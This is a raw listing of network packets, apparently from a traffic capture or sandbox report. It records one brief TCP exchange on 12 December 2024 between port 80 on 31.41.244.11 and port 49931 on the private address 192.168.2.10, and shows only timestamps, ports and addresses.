Dec 12, 2024 16:48:37.639889002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.639914036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.639929056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.641293049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.641333103 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.642064095 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.642901897 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.643076897 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.643095970 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.643137932 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.644609928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.644695997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.644979954 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.645076036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.646315098 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.646456957 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.646522999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.646564960 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.647927999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.647953987 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.647989035 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.649421930 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.649456024 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.649528980 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.649573088 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.650969028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.651010036 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.651063919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.651063919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.652518988 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.652538061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.652595043 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.653978109 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.654021978 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.654176950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.654227018 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.655612946 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.655647039 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.655657053 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.655678988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.657113075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.657130957 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.657160997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.657177925 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.658472061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.658519030 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.658708096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.658747911 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.659929991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.659985065 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.660012007 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.660926104 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.661422968 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.661535978 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.661545992 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.661849976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.662929058 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.662946939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.662969112 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.662990093 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.664364100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.664383888 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.664412022 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.664449930 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.665790081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.665805101 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.665843010 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.665894032 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.667218924 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.667236090 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.667280912 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.668551922 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.668569088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.668596029 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.668612003 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.670126915 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.670140028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.670169115 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.670186996 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.671387911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.671406031 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.671446085 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.672739983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.672758102 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.672785997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.672811031 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.674096107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.674113035 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.674137115 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.674149036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.675559998 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.675575972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.675600052 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.675621986 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.676733971 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.676774025 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.677743912 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.677858114 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.678200006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.678247929 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.678541899 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.678586006 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.679560900 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.679838896 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.679893017 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.680959940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.680974007 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.680996895 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.681027889 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.682305098 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.682337046 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.682363987 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.682385921 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.683578014 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.683629990 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.683725119 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.683772087 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.685041904 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.685055017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.685091019 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.685100079 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.686353922 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.686420918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.686629057 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.686676025 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.687777042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.687800884 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.687865019 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.689100027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.689140081 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.689227104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.689292908 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.690493107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.690536976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.690562963 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.690599918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.692011118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.692027092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.692080021 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.693272114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.693288088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.693327904 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.694721937 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.694736004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.694757938 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.694773912 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.696252108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.696265936 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.696310997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.696331978 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.697633028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.697647095 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.697694063 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.697694063 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.698822975 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.698837042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.698887110 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.700154066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.700165987 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.700202942 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.701594114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.701606989 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.701633930 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.701658010 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.702800989 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.702847004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.703171968 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.703219891 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.704164028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.704224110 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.705224037 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.705355883 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.705651045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.705663919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.705708981 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.707036018 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.707048893 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.707081079 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.708446980 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.708462954 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.708489895 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.708514929 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.709815979 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.709830046 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.709865093 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.709883928 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.711103916 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.711116076 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.711144924 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.711163998 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.712549925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.712779045 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.829777002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.829814911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.829886913 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.830214977 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.830220938 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.830262899 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.831166983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.831221104 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.831239939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.831648111 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.832489967 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.832495928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.832549095 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.833617926 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.833625078 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.833682060 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.834602118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.834609032 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.834688902 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.835633039 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.835639000 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.835690022 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.836623907 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.836630106 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.836680889 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.837753057 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.837759018 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.837807894 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.838737011 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.838743925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.838814974 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.839904070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.839910984 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.839976072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.840996027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.841001987 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.841054916 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.842101097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.842107058 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.842160940 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.843125105 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.843131065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.843174934 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.844147921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.844155073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.844193935 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.845284939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.845292091 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.845340014 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.846328020 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.846333981 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.846379042 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.847354889 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.847414970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.847470999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.847655058 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.848473072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.848479033 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.848530054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.849437952 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.849503994 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.849736929 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.850203037 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.850538969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.850544930 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.850584984 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.851641893 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.851648092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.851690054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.852659941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.852665901 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.852708101 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.853806973 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.853812933 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.853846073 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.854846954 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.854854107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.854904890 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.855914116 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.855920076 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.855963945 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.856965065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.856971025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.857024908 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.858119011 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.858124971 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.858164072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.859154940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.859162092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.859210014 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.860189915 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.860194921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.860234022 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.861268044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.861274004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.861320019 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.862307072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.862313986 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.862363100 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.863353968 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.863421917 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.863634109 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.863709927 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.864463091 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.864469051 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.864516020 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.865653992 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.865658998 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.865705013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.866545916 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.866555929 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.866604090 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.867643118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.867764950 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.867765903 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.867937088 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.868694067 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.868752003 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.868813992 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.868864059 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.869796991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.870027065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.870038986 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.870264053 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.870889902 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.870897055 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.870937109 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.872059107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.872076988 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.872117996 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.873084068 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.873090982 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.873133898 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.874124050 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.874245882 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.874274969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.874497890 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.875200987 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.875206947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.875246048 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.876319885 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.876326084 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.876364946 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.877357006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.877362967 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.877399921 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.878293991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.878382921 CET	49931	80	192.168.2.10	31.41.244.11
